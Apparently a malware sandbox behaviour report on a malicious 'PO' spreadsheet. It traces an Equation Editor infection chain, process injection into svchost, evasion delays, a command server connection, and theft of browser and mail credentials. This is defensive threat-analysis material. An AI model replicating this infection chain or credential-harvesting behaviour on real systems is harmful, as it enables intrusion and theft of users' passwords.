                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: PO-00006799868.xlsStream path 'MBD0043CF7E/MBD002A6130/CONTENTS' entropy: 7.9540151927 (max. 8.0)
                Source: PO-00006799868.xlsStream path 'Workbook' entropy: 7.9987777032 (max. 8.0)
                Source: 68730000.0.drStream path 'MBD0043CF7E/MBD002A6130/CONTENTS' entropy: 7.9540151927 (max. 8.0)
                Source: 68730000.0.drStream path 'Workbook' entropy: 7.99889335374 (max. 8.0)
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\AppData\Local\directory\name.exeAPI/Special instruction interceptor: Address: B3244
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 565Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 9412Jump to behavior
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeAPI coverage: 6.9 %
                Source: C:\Users\user\AppData\Local\directory\name.exeAPI coverage: 4.9 %
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3192Thread sleep time: -300000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 2464Thread sleep count: 565 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 2464Thread sleep time: -1695000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 2120Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 2464Thread sleep count: 9412 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 2464Thread sleep time: -28236000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exe TID: 2180Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_0021449B GetFileAttributesW,FindFirstFileW,FindClose,10_2_0021449B
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_0021C75D FindFirstFileW,FindClose,10_2_0021C75D
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_0021C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_0021C7E8
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012C449B GetFileAttributesW,FindFirstFileW,FindClose,11_2_012C449B
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012CC75D FindFirstFileW,FindClose,11_2_012CC75D
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012CC7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_012CC7E8
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012CF17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_012CF17E
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012CF021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_012CF021
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012CF47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_012CF47F
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012C3833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_012C3833
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012C3B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_012C3B56
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_012CBD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_012CBD48
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_001B4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_001B4AFE
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Jump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeAPI call chain: ExitProcess graph end nodegraph_11-97577
                Source: C:\Users\user\AppData\Local\directory\name.exeAPI call chain: ExitProcess graph end nodegraph_11-97676
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_0022401F BlockInput,10_2_0022401F
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_001B3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_001B3B4C
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_01295BFC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,11_2_01295BFC
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_0022C104 LoadLibraryA,GetProcAddress,10_2_0022C104
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_000B34B0 mov eax, dword ptr fs:[00000030h]11_2_000B34B0
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_000B3510 mov eax, dword ptr fs:[00000030h]11_2_000B3510
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_000B1E70 mov eax, dword ptr fs:[00000030h]11_2_000B1E70
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_002081D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_002081D4
                Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_001DA2A4 SetUnhandledExceptionFilter,10_2_001DA2A4
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_001DA2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_001DA2D5
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0128A2A4 SetUnhandledExceptionFilter,11_2_0128A2A4
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_0128A2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0128A2D5

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\SysWOW64\svchost.exeDomain query: geoplugin.net
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 107.173.4.16 2404Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 178.237.33.50 80Jump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008Jump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008Jump to behavior
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_00208A73 LogonUserW,10_2_00208A73
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_001B3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,10_2_001B3B4C
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_001B4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_001B4A35
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_00214CFA mouse_event,10_2_00214CFA
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\taskhostw.exe "C:\Users\user\AppData\Roaming\taskhostw.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Roaming\taskhostw.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\taskhostw.exe" Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\slsrkklvishzfgljivqawntxyxjphjjhhw"Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\dnxjld"Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\nhlcmvhqk"Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_002081D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,10_2_002081D4
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_00214A08 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,10_2_00214A08
                Source: taskhostw.exe, 0000000A.00000000.449366301.0000000000264000.00000002.00000001.01000000.00000005.sdmp, taskhostw.exe, 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmp, name.exe, 0000000B.00000000.453360398.0000000001314000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                Source: taskhostw.exe, name.exeBinary or memory string: Shell_TrayWnd
                Source: svchost.exe, 0000000C.00000002.1055307081.0000000000734000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_3_02A77BAB cpuid 10_3_02A77BAB
                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 11_2_01295007 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,11_2_01295007
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_001F215F GetUserNameW,10_2_001F215F
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_001E40BA __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,10_2_001E40BA
                Source: C:\Users\user\AppData\Roaming\taskhostw.exeCode function: 10_2_001B4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,10_2_001B4AFE
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 18.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.name.exe.10a0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.name.exe.10b0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.name.exe.10b0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.name.exe.10a0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000012.00000002.485943669.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.1055266784.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.485970456.0000000000604000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.1055307081.0000000000734000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.486080361.00000000010B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.457244106.00000000010A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: name.exe PID: 3328, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3316, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: name.exe PID: 3000, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2176, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\svchost.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccountJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULLJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULLJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqliteJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.dbJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.dbJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.dbJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
